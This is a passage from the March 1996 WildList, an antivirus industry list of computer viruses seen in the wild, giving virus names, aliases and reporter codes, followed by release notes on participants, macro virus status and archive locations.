She_Has.................[Breasts........] DgIwPdTd Sibylle.................[...............] DcDgFl Sleep_Walker.1266.......[Swalker........] JkRrSc Stealth_Boot.B..........[AMSE, NopB.....] CjDcDgEvJkPdRtScSgSmYpYr Stealth_Boot.C..........[AMSE, NopB2....] 
CjEvGmJkPdRtScSgYr Stoned.16.A.............[Brunswick......] DcDgScYr Stoned.Angelina.A.......[...............] CsDcDgEvFlGmIwJdJkKsMhMsPbPdScSg (continued) SmTdYp Stoned.Azusa.A..........[Hong Kong......] CjCsDgFsJkKsRrRtScYpYr Stoned.Bravo............[...............] JkMsYp Stoned.Bunny.A..........[...............] ScSgWsYp Stoned.Daniela..........[...............] ScSg Stoned.Dinamo...........[...............] DcIwRtScYr Stoned.Empire.Int_10.B..[...............] JkRtScSg Stoned.Empire.Monkey.A..[Monkey.........] DcGmJkKsOhPdRrRtScSg Stoned.Empire.Monkey.B..[Monkey 2.......] CjDcDgEvEwFsGmIwJdJkKsMhOhPdRkRr (continued) RtRvScSgSmTdWsYp Stoned.June_4th.A.......[Bloody!........] CjCsDgJkKsRkRrScSmWsYr Stoned.Kiev.............[Epbr...........] CjEkJkPdRt Stoned.Lzr..............[Lisa2, Whit....] AdCjDcEvFsJkRtScYr Stoned.Manitoba.........[Stonehenge.....] DcDgFsJkKsRtSc Stoned.Michelangelo.A...[...............] AdCjCsDcDgEkFlFsGmGpJkKsOhPbPdRk (continued) RrRtScSgSmWsYpYr Stoned.No_INT.A.........[Stoned.........] CjCsDcDgEwFsGmIwJkKsMhOhPbPdRrRt (continued) ScSgWsYpYr Stoned.NOP..............[NOP............] DgJkWs Stoned.Standard.A.......[New Zealand....] CjDcDgEkEvFsGmGpJkKsLsPdRkRrRtSc (continued) SmWsYp Stoned.Swedish_Disaster.[...............] CjDgKs Stoned.W-Boot...........[Stoned.P, Wonka] AdDcEvJkMsRrScWsYr +SVC.2936.C..............[...............] EvJk SVC.3103.A..............[SVC 5.0........] DgEkSc Swiss_Boot..............[Swiss Army.....] DcFlFsJkSm Tai-Pan.438.............[Whisper........] DcDgFlFsGmJkKsMhMsPbPdRtSgTdWsYr Tai-Pan.666.............[D2D, Doom2Death] DcDgEkEwJkKsMhMsRtScSgSmWsYp Tequila.A...............[...............] CsDcDgEwFsGmGpJkPdRfRkRtScSgSmTd (continued) WsYpYr Three_Tunes.1784........[Flip, PCBB.1784] AeCjDcEvJkSc Trakia.653..............[...............] RrSc Tremor.4000.A...........[...............] CsFlFsJkKsMhMsPbRtSgWsYp Trojector.1463..........[Athens.........] DcDgFsJkSgSm Unashamed...............[...............] 
IwJdJkMhPdScYp Urkel...................[Nwait..........] CjDcFsJkScSgWs V-Sign..................[Cansu, Sigalit.] CjDcDgFsGmIwJkKsLsMhPbPdRrRtScSg (continued) SmWsYr Vacsina.TP-05.A.........[RCE-1206.......] CjDgFsRtSc Vacsina.TP-16.A.........[RCE-1339.......] DgFsSm Vampiro.................[...............] DgRaWs Vienna.648.Reboot.A.....[DOS-62.........] AeDgEkGpSg Vinchuca................[...............] DgRaWs Virogen.Pinworm.........[Pinworm........] CjJk VLamiX..................[Die Lamer......] DgJkMsRt WelcomB.................[Bupt.9146......] AdCsDcEvGmIwJkKsMhMsPbPdRtScYp WXYC....................[...............] CjJkMsOhScSmWs Xeram.1664..............[N-Xeram.1664...] JkPd Yankee Doodle.TP-39.....[RCE-2772.......] DgFs Yankee Doodle.TP-44.A...[RCE-2885.......] DgEkEwFsGmGpJkKsLsMhMsRtSgSmTd Yankee Doodle.XPEH.4928.[Micropox.......] FlFsJkYr _814....................[Unsnared, V.814] AeGp ============================================================================ Total for the WildList: 189 ============================================================================ Release Notes for the 10 March 1996 list: There will be a meeting of WildList participants at the NCSA Conference in Arlington, Virginia, USA, on Sunday, March 31st, at 13:00. Several WildList participants will be there (some are speaking). I have corrected Eduardo Velasquez's name, which I had as Eduardo Medina. Klas Scholdstrom has replaced Mikael Larsson at QA Informatik in Sweden. Dave Chess has replaced me at IBM since I am now a consultant to IBM and since he's actually been giving me the IBM reports all along. Four macro viruses (Nuclear.A, Nuclear.B, Concept.Fr (Word, French Ed.), and Concept.Imposter) have moved onto the supplemental list. I am continuously seeking WildList participants for regional reporting, especially in Central and South America, Spain, former Soviet republics, and the Far East. 
Such new participants will need to be in a position where they can monitor and verify virus incidents. People who develop av products are best suited. People who represent one or more av products (agents) and provide localized support may also be qualified if they actually verify the viruses or forward samples to developers.

If you thus qualify, please send your name, location, organization, product name, favorite brand of beer, and references (preferably CARO members who know you). Send the information to wildlist@vcnet.com. Thanks.
============================================================================
The collation of this list is done by Joe Wells, Consultant to IBM's T.J.Watson Research Center, who is solely responsible for its contents.

The latest WildList is always posted directly by me to the NCSA Security forum on Compuserve, in the Virus Info/Tools library. The official archive location for the WildList is ftp.ncsa.com in pub/virus/wildlist. A complete archive of WildLists is available at the Virus Bulletin web site (http://www.virusbtn.com/WildLists/index.html).

The WildList is copyright material, but may be freely quoted or cited in part or in whole. No permission is needed to reprint the list.

All mail in regard to the WildList should be sent to wildlist@vcnet.com. My former address, wildlist@aol.com, is no longer active.
============================================================================
WildList Vol.603 - (c)1993-1996 Joe Wells - 75511,635 - wildlist@vcnet.com
============================================================================